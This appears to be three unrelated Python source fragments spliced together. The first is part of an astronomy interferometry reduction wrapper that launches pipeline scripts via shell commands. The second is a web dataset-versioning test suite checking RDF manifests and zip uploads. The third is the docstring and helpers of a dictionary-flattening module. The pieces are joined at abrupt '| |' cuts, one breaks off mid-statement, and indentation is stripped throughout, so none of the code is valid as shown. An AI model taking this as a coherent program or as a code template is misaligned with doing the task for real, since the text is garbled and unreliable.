oifits.add_argument("--snr-threshold",dest="snr_threshold",type=str,default='2.0d',
help="list of SNR threshold for fringe selection [%(default)s]")
oifits.add_argument("--flux-threshold",dest="flux_threshold",type=str,default='10.0d',
help="list of flux threshold for faint signal rejection [%(default)s]")
oifits.add_argument("--max-integration-time-oifits", dest="max_integration_time_oifits",
default='150.d',type=str,
help='maximum integration into a single file, in (s).\n'
'This apply to OIFITS steps [%(default)s]')
calib = parser.add_argument_group ('(3) calibrate',
'\nSet of options used to control the calibration steps.')
calib.add_argument("--calibrate",dest="calibrate",default='TRUE',
choices=TrueFalseOverwrite,
help="(re)do the calibration process [%(default)s]")
calib.add_argument("--targ-list",dest="targ_list",default='mircx_targets.list',type=str,
help="local database to query to identify SCI and CAL targets [%(default)s]")
calib.add_argument("--calib-cal",dest="calibCal",default='FALSE',
choices=TrueFalse, help="calibrate the calibrators? [%(default)s]")
summary = parser.add_argument_group ('(4) summary',
'\nSet of options used to control the summary report\n'
'file production and email alerts.')
summary.add_argument("--email",dest="email",type=str,default='',
help='email address to send summary report file TO [%(default)s]')
summary.add_argument("--sender",dest="sender",type=str,default='<EMAIL>',
help='email address to send summary report file FROM [%(default)s]')
compare = parser.add_argument_group ('(5) compare',
'\nOptions used to control the exploration of the impact'
'of varying ncoherent on the vis SNR and T3ERR.')
compare.add_argument("--ncoh-plots", dest="ncoh_plots",default='FALSE',
choices=TrueFalse,
help="use the wrapper to produce plots of ncoherent vs\n"
"vis SNR and T3ERR [%(default)s].")
# Parse arguments:
argopt = parser.parse_args ()
# Verbose:
elog = log.trace('mircx_redcal_wrapper')
# Check length of ncs,nbs,mitp,bbias,snr,mito and dates are equal
dates = argopt.dates.split(',')
ncs = str(argopt.ncs).split(',')
nbs = str(argopt.nbs).split(',')
mitp = str(argopt.max_integration_time_preproc).split(',')
bbias = str(argopt.bbias).split(',')
snr = str(argopt.snr_threshold).split(',')
fth = str(argopt.flux_threshold).split(',')
mito = str(argopt.max_integration_time_oifits).split(',')
for item in [ncs,nbs,mitp,bbias,snr,fth,mito]:
if isinstance(item, str):
item = [item]
if len(ncs) == 1 and 'd' in ncs[0]:
# Account for some being default settings:
ncs = [ncs[0].replace('d','')]*len(dates)
if len(nbs) == 1 and 'd' in nbs[0]:
# Account for some being default settings:
nbs = [nbs[0].replace('d','')]*len(dates)
if len(mitp) == 1 and 'd' in mitp[0]:
# Account for some being default settings:
mitp = [mitp[0].replace('.d','')]*len(dates)
if len(bbias) == 1 and 'd' in bbias[0]:
# Account for some being default settings:
bbias = [bbias[0].replace('d','')]*len(dates)
if len(snr) == 1 and 'd' in snr[0]:
# Account for some being default settings:
snr = [snr[0].replace('d','')]*len(dates)
if len(fth) == 1 and 'd' in fth[0]:
# Account for some being default settings:
fth = [fth[0].replace('d','')]*len(dates)
if len(mito) == 1 and 'd' in mito[0]:
# Account for some being default settings:
mito = [mito[0].replace('.d','')]*len(dates)
if len(ncs) == len(nbs) == len(mitp) == len(bbias) == len(snr) == len(fth) == len(mito) == len(dates):
log.info('Length of reduction options checked: ok')
else:
log.error('Error in setup: length of options is not equal!')
sys.exit()
# Force choices of nbs and ncs when bbias=TRUE:
for bb in range(0, len(bbias)):
if bbias[bb] == 'TRUE':
log.info('bbias instance set to true so setting corresponding ncs=1 and nbs=0')
ncs[bb] = 1
nbs[bb] = 0
elif bbias[bb] != 'FALSE':
log.error('Option '+str(bbias[bb])+' not a valid input for bbias')
sys.exit()
# check argopt.ncoherent:
ncoh = str(argopt.ncoherent).split(',')
if argopt.ncoh_plots == 'FALSE':
if len(ncoh) == 1 and 'd' in ncoh[0]:
ncoh = [ncoh[0].replace('d','')]*len(dates)
elif len(ncoh) != len(dates):
log.error("Error: length of --ncoherent doesn't match length of --dates!")
sys.exit()
else:
if len(ncoh) == 1 and 'd' in ncoh[0]:
ncoh = range(2,16)
# remove '/' from end of the reduction and raw base directories
if argopt.raw_dir[-1] == '/':
rawBase = argopt.raw_dir[:-1]
else:
rawBase = argopt.raw_dir
if argopt.red_dir[-1] == '/':
redBase = argopt.red_dir[:-1]
else:
redBase = argopt.red_dir
# Ensure emailing will work:
try:
pw = os.environ['MAILLOGIN']
except KeyError:
log.error('Password for '+argopt.sender+' not found!')
log.info('The password for the email account parsed to --sender')
log.info(' needs to be saved to environment variable $MAILLOGIN.')
sys.exit()
# Ensure that the pipeline can be found
try:
ext = os.environ['MIRCX_PIPELINE']
except KeyError:
log.error('Environment variable $MIRCX_PIPELINE not found')
log.info('Please rectify this before continuing')
sys.exit()
if not os.path.isfile(os.environ['MIRCX_PIPELINE']+'/mircx_pipeline/'+argopt.targ_list):
log.error(os.environ['MIRCX_PIPELINE']+'/mircx_pipeline/'+argopt.targ_list+' not found!')
log.info('Please rectify this before continuing')
sys.exit()
else:
localDB = os.environ['MIRCX_PIPELINE']+'/mircx_pipeline/'+argopt.targ_list
# ^-- this is the local target history database
for d in range(0, len(dates)):
# special setting for execution on protostar @ exeter:
if socket.gethostname() in ['protostar','mircx','yso']:
rawBase_p = rawBase+'/'+dates[d][0:7]
rawBase = rawBase_p
# 1. Make directory dates_nbsncsbbiasmitp in argopt.red-dir
if bbias[d] == 'TRUE':
bbstr = 'T'
else:
bbstr = 'F'
suf1 = '_nbs'+str(nbs[d])+'ncs'+str(ncs[d])+'bbias'+bbstr+'mitp'+mitp[d]
redDir = redBase+'/'+dates[d]+suf1
files.ensure_dir(redDir)
# 2. run reduce.py with --oifits=FALSE
opt1 = '--ncs='+str(ncs[d])+' --nbs='+str(nbs[d])+' --bbias='+str(bbias[d])
opt2 = ' --max-integration-time-preproc='+str(mitp[d])
opts = opt1+opt2
rawDir = rawBase+'/'+dates[d]
with cd(redDir):
com = "mircx_reduce.py "+opts+" --raw-dir="+rawDir
ma = " --preproc-dir="+redDir+"/preproc --rts-dir="+redDir+"/rts"
nd = " --oifits=FALSE --reduce="+argopt.reduce
pipe = "> nohup_preproc_rts.out"
with open("nohup_preproc_rts.out", 'w') as output:
output.write('\n')
log.info('Execute nohup '+com+ma+nd+' '+pipe)
subprocess.call('nohup '+com+ma+nd+' '+pipe+' &', shell=True)
nf = open('nohup_preproc_rts.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# 3. Make directory snrfthmito in argopt.red-dir/dates_nbsncsbbiasmitp
suf2 = 'snr'+str(snr[d]).replace('.','p')+'fth'+str(fth[d]).replace('.','p')+'mito'+str(mito[d])
files.ensure_dir(redDir+'/'+suf2)
oiDir = redDir+'/'+suf2+"/oifits_nc"+str(ncoh[d])
# 4: identify calibrators
targs = lookup.targList(dates[d],rawBase,redDir) # produces target summary file if directory is new
calInfo, scical = lookup.queryLocal(targs, localDB)
if argopt.ncoh_plots == 'FALSE':
# --------------------------------------------------------------
# 5. Run reduce.py with --rts=FALSE and --preproc=FALSE
# assuming different ncoherent are for different argopt.dates
# --------------------------------------------------------------
opt3 = ' --max-integration-time-oifits='+str(mito[d])+' --snr-threshold='+str(snr[d])+' --flux-threshold='+str(fth[d])
opts2 = opt1+' --ncoherent='+str(ncoh[d])+opt3
with cd(redDir+'/'+suf2):
com = "mircx_reduce.py "+opts2+" --raw-dir="+rawDir+" --preproc=FALSE"
ma = " --preproc-dir="+redDir+"/preproc --rts=FALSE --rts-dir="+redDir+"/rts"
nd = " --oifits-dir="+oiDir+" --rm-preproc=TRUE --rm-rts=TRUE --reduce="+argopt.reduce
pipe = "> nohup_oifits.out"
with open("nohup_oifits.out", 'w') as output:
output.write('\n')
log.info('Execute nohup '+com+ma+nd+' '+pipe)
subprocess.call('nohup '+com+ma+nd+' '+pipe+' &', shell=True)
nf = open('nohup_oifits.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# 6. Check that the oifits step successfully created .fits files in oiDir:
if os.path.isdir(oiDir):
if len(glob.glob(oiDir+'/*.fits')) > 0:
redF = False # reduction did not fail
# a: run report.py script
with cd(oiDir):
command = "mircx_report.py --oifits-dir="+oiDir
pipe = " > nohup_report.out"
with open('nohup_report.out', 'w') as output:
output.write('\n')
log.info('Execute nohup '+command+' '+pipe)
subprocess.call("nohup "+command+' '+pipe+' &', shell=True)
nf = open('nohup_report.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# b: run mircx_transmission.py
today = datetime.datetime.strptime(dates[d], '%Y%b%d')
nextDay = today + datetime.timedelta(days=1)
nD = nextDay.strftime('%Y%b%d')
with cd(redDir):
com = "mircx_transmission.py --dir="+redBase+" --num-nights=14"
ma = " --targ-list="+argopt.targ_list
nd = " --oifits-dir="+suf2+"/oifits_nc"+str(ncoh[d])
pipe = "> nohup_transmission.out"
with open('nohup_transmission.out', 'w') as output:
output.write('\n')
log.info('Execute nohup '+com+ma+nd+' '+pipe)
subprocess.call("nohup "+com+ma+nd+' '+pipe+' &', shell=True)
nf = open('nohup_transmission.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# d: run calibrate.py
if | |
of the versions and the files in that version"""
#Definitions
subj = URIRef(self.getManifestUri("datasets/TestSubmission"))
base = self.getManifestUri("datasets/TestSubmission/")
dcterms = "http://purl.org/dc/terms/"
ore = "http://www.openarchives.org/ore/terms/"
oxds = "http://vocab.ox.ac.uk/dataset/schema#"
stype = URIRef(oxds+"DataSet")
#---------Version 0
# Create a new dataset, check response
self.createSubmissionDataset()
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),10,'Graph length %i' %len(rdfgraph))
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 3, "Parts")
#---------Version 1
# Upload zip file, check response
zipdata = self.uploadSubmissionZipfile()
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
# Access and check list of contents of version 0
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=0",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),10,'Graph length %i' %len(rdfgraph))
#---------Version 2
# Upload zip file, check response
zipdata2 = self.uploadSubmissionZipfile(file_to_upload="testdir2.zip")
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),13,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile - testdir.zip!")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile2, "Difference between local and remote zipfile - testdir2.zip!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 5, "Parts")
#---------Version 3
# Delete file, check response
resp = self.doHTTP_DELETE(
resource="datasets/TestSubmission/testdir.zip",
expect_status=200, expect_reason="OK")
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=404, expect_reason="Not Found")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile2, "Difference between local and remote zipfile - testdir2.zip!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
#---------Version 4
# Update zip file, check response
zipdata3 = self.updateSubmissionZipfile(file_to_upload="testrdf4.zip", filename="testdir2.zip")
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=404, expect_reason="Not Found")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata3, zipfile2, "Difference between local and remote zipfile - testdir2.zip!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
#=========Access each of the versions
#---------Version 0
# Access and check list of contents of version 0
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=0",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),10,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'0') in rdfgraph, 'oxds:currentVersion')
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=0",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 3, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
#---------Version 1
# Access and check list of contents of version 1
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=1",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir.zip")) in rdfgraph, 'ore:aggregates testdir.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'1') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=1",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile - Version 1!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=1",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
self.assertEqual(len(parts['testdir.zip'].keys()), 13, "File stats for testdir.zip")
#---------Version 2
# Access and check list of contents of version 2
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=2",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),13,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir.zip")) in rdfgraph, 'ore:aggregates testdir.zip')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir2.zip")) in rdfgraph, 'ore:aggregates testdir2.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'2') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=2",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile - Version 2!")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip?version=2",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile2, "Difference between local and remote zipfile - Version 2!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=2",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 5, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
self.assertEqual(len(parts['testdir.zip'].keys()), 13, "File stats for testdir.zip")
self.assertEqual(len(parts['testdir2.zip'].keys()), 13, "File stats for testdir2.zip")
#---------Version 3
# Access and check list of contents of version 3
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=3",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir2.zip")) in rdfgraph, 'ore:aggregates testdir2.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'3') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip?version=3",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile, "Difference between local and remote zipfile - Version 3!")
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=3",
expect_status=404, expect_reason="Not Found")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=3",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
self.assertEqual(len(parts['testdir2.zip'].keys()), 13, "File stats for testdir2.zip")
#---------Version 4
# Access and check list of contents of version 4
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=4",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(ore+"aggregates"),URIRef(base+"testdir2.zip")) in rdfgraph, 'ore:aggregates testdir2.zip')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'4') in rdfgraph, 'oxds:currentVersion')
self.failUnless((subj,URIRef(dcterms+"modified"),None) in rdfgraph, 'dcterms:modified')
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip?version=4",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata3, zipfile, "Difference between local and remote zipfile - Version 4!")
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip?version=4",
expect_status=404, expect_reason="Not Found")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=4",
expect_status=200, expect_reason="OK", expect_type="application/json")
state | |
# ----------------------------------------------------------------------------
# Copyright (C) 2017 Verizon. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ----------------------------------------------------------------------------
'''Flatten nested list and dict structures.
A dictionary is *flat* if all of its values are either scalars or
lists of scalars. The ``flatten()`` function turns a nested structure
into a list of flat dictionaries. The keys in the resulting
dictionaries will be strings formed by the dot-separated ``join()``
of successively nested dictionary keys from the original dictionary.
Example::
>>> flatten.flatten({
... 'A': {
... 'b': 1,
... 'c': {
... 'x': 2,
... 'y': 3
... }
... }
... })
[{'A.c.y': 3, 'A.c.x': 2, 'A.b': 1}]
When a structure containing lists is flattened, the result will
include multiple flat dictionaries. A single list ``l`` will result in
``len(l)`` flat dictionaries in the result.
Examples::
>>> flatten.flatten({
... 'A': [
... {'b': {'c': 1}},
... {'b': {'c': 2}}
... ]
... })
[{'A.b.c': 1}, {'A.b.c': 2}]
>>> flatten.flatten({
... 'A': {
... 'b': [
... {'c': 1},
... {'c': 2}
... ]
... }
... })
[{'A.b.c': 1}, {'A.b.c': 2}]
Note that the preceding examples show that flattening different
structures can have the same result.
Multiple lists will result in multiple dictionaries according to the
product of their lengths.
Example::
>>> flatten.flatten({
... 'A': {
... 'b': [{'c': 1}, {'c': 2}, {'c': 3}],
... 'u': [{'v': 1}, {'v': 2}]
... }
... })
[{'A.u.v': 1, 'A.b.c': 1}, {'A.u.v': 2, 'A.b.c': 1},
{'A.u.v': 1, 'A.b.c': 2}, {'A.u.v': 2, 'A.b.c': 2},
{'A.u.v': 1, 'A.b.c': 3}, {'A.u.v': 2, 'A.b.c': 3}]
.. note:: To be successfully flattened, a nested structure must satisfy the
following criterion:
All lists in the structure must contain only ``dict`` or scalar
types, and all elements of a given list must be of the same type.
'''
import itertools
import json
DEFAULT_SEPARATOR = '.'
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_scalar_type
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_scalar_type(the_type):
'''Answer "is this type scalar?".'''
return the_type in [
type(None),
bool,
int,
float,
str,
unicode,
long,
complex
]
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_scalar
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_scalar(the_thing):
'''Answer "is the type of this thing a scalar type?".'''
return is_scalar_type(type(the_thing))
# # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# # is_or_is_dict_of
# # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# def is_or_is_dict_of(the_thing, predicate):
# '''
# Answer "is this a thing or list of things for which predicate is true?"
# '''
# return is_scalar_type(type(the_thing))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_primitive_type
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_primitive_type(the_type):
'''Answer "is this type primitive?".'''
return is_scalar(the_type) or the_type in [
type({}),
type([])
]
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# is_primitive
